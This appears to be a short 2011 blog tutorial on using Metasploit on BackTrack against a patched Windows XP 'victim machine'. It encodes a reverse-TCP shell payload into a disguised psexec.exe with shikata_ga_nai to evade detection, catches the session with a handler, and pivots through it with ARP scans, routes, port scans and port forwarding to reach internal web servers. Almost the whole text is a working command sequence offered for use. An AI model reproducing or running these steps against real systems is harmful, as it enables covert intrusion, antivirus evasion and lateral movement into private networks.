Contact Us |
03/15/11 Meterpreter encoding & pivot
In this tutorial I use the Back|Track distro and metasploit to encode the psexec.exe then copy it over to a WindowsXP fully patched box. We can get our executable to our victim machine a number of ways and I will that for later. I have listed the steps involved in using metasploit below and in the video.<br />
# msfpayload windows/shell/reverse_tcp LHOST=192.168.1.132, LPORT=4444 R | msfencode -c 10 -e x86/shikata-ga_nai -x /root/psexec.exe -t exe > psexec3.exe # msfconsole msf> use multi/handler msf> set payload windows/meterpreter/reverse_tcp msf> set LPORT 4444 msf> set LHOST 192.168.1.132 msf> exploit meterpreter> ipconfig This listed 2 different network interfaces 192.168.1.134 & 192.168.15.2 meterpreter> run arp_scanner -h help cmd meterpreter> run arp_scanner -r 192.168.15.1/24 meterpreter> background msf> route add 192.168.15.1 255.255.255.0 1 Now this 1 is specific to the meterpreter session msf> route print msf> use auxiliary/scanner/portscan/tcp msf> set RHOSTS 192.168.15.1, 192.168.15.3 We got these ips fro the arp scan we did earlier msf> set PORTS 1-200 You can set this to what you like but it will take time msf> run Now you have a list of open ports that you can exploit msf> back msf> sessions -i 1 meterpreter> portfwd add -l 8000 -p 80 -r 192.168.15.3 meterpreter> portfwd add -l 8080 -p 80 -r 192.168.15.1 open firefox http://127.0.0.1:8000 & http://127.0.0.1:8080 Now we have been able to view 2 systems that are internal to a network using the pivoting of the meterpreter payload. The scan we did went through 192.168.1.134 > 192.168.15.2 > 192.168.15.1 & 192.168.15.3. We then used the portfwd command to display the internal web page locally over SSL. |
|
Return to Home | |